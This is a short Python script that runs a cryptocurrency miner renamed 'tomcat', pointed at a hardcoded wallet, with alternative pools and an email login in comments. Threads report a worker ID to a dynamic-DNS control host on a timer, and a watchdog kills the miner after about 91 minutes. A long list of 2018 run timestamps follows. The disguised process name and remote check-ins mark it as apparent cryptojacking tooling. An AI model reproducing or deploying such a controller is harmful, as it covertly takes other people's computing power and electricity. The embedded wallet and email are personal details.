import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:25:01.562712
#2018-02-17 16:10:07.353833
#2018-02-17 17:59:03.528707
#2018-02-17 19:47:05.714676
#2018-02-17 21:34:06.229475
#2018-02-17 23:18:07.448025
#2018-02-18 01:06:05.660180
#2018-02-18 02:53:02.067203
#2018-02-18 04:42:04.127211
#2018-02-18 06:34:04.807146
#2018-02-18 08:22:07.215076
#2018-02-18 10:11:06.004284
#2018-02-18 11:57:03.354160
#2018-02-18 13:42:07.455391
#2018-02-18 15:33:04.059937
#2018-02-18 17:21:06.489804
#2018-02-18 19:10:06.159907
#2018-02-18 20:56:03.845613
#2018-02-18 22:41:06.356946
#2018-02-19 00:30:07.137286
#2018-02-19 02:15:03.111509
#2018-02-19 04:02:07.121461
#2018-02-19 05:47:02.035196
#2018-02-19 07:34:04.243433
#2018-02-19 09:24:04.797562
#2018-02-19 11:13:04.294827
#2018-02-19 13:01:04.936488
#2018-02-19 14:48:09.486153
#2018-02-19 16:38:01.610432
#2018-02-19 18:24:07.639694
#2018-02-19 20:10:08.808487
#2018-02-19 22:00:01.835123
#2018-02-19 23:46:01.607123
#2018-02-20 01:33:05.313489
#2018-02-20 03:20:09.205412
#2018-02-20 05:07:04.177737
#2018-02-20 06:50:05.169735
#2018-02-20 08:36:04.367705
#2018-02-20 10:19:08.051245
#2018-02-20 12:04:01.900339
#2018-02-20 13:51:01.416866
#2018-02-20 15:36:08.104775
#2018-02-20 17:21:04.565199
#2018-02-20 19:12:06.816485
#2018-02-20 21:00:11.551193
#2018-02-20 22:46:01.663569
#2018-02-21 00:29:01.340040
#2018-02-21 02:15:03.092729
#2018-02-21 04:01:07.660738
#2018-02-21 05:48:03.967380
#2018-02-21 07:36:06.988303
#2018-02-21 09:21:01.667475
#2018-02-21 11:09:08.575790
#2018-02-21 12:56:12.918184
#2018-02-21 14:45:03.411971
#2018-02-21 16:32:01.527103
#2018-02-21 18:21:07.636641
#2018-02-21 20:06:07.457060
#2018-02-21 21:54:05.628564
#2018-02-21 23:39:08.271245
#2018-02-22 01:28:06.151308
#2018-02-22 03:16:02.135525
#2018-02-22 05:02:04.503924
#2018-02-22 06:44:06.162112
#2018-02-22 08:33:06.905151
#2018-02-22 10:19:06.410563
#2018-02-22 12:04:09.887435
#2018-02-22 13:50:06.363796
#2018-02-22 15:56:08.671003
#2018-02-22 17:44:01.297289
#2018-02-22 19:30:10.517647
#2018-02-22 21:24:03.446812
#2018-02-22 23:09:06.840976
#2018-02-23 00:55:09.194216
#2018-02-23 02:42:05.306527
#2018-02-23 04:30:08.506115
#2018-02-23 06:15:08.815968
#2018-02-23 08:03:07.263306
#2018-02-23 10:18:04.648607
#2018-02-23 12:09:01.667584
#2018-02-23 13:57:05.618029
#2018-02-23 15:48:07.264855
#2018-02-23 17:35:09.490567
#2018-02-23 19:23:04.805400
#2018-02-23 21:07:05.891460
#2018-02-23 22:53:04.999068
#2018-02-24 01:09:05.881838
#2018-02-24 03:02:01.356578
#2018-02-24 04:48:01.364129
#2018-02-24 06:32:04.641571
#2018-02-24 08:21:01.457429
#2018-02-24 10:04:04.647136
#2018-02-24 12:02:05.185678
#2018-02-24 13:50:06.697283
#2018-02-24 15:39:03.707549
#2018-02-24 17:33:06.308053
#2018-02-24 19:19:04.086906
#2018-02-24 21:58:07.563052
#2018-02-25 02:34:01.674751
#2018-02-25 06:14:07.281345
#2018-02-25 11:40:09.280277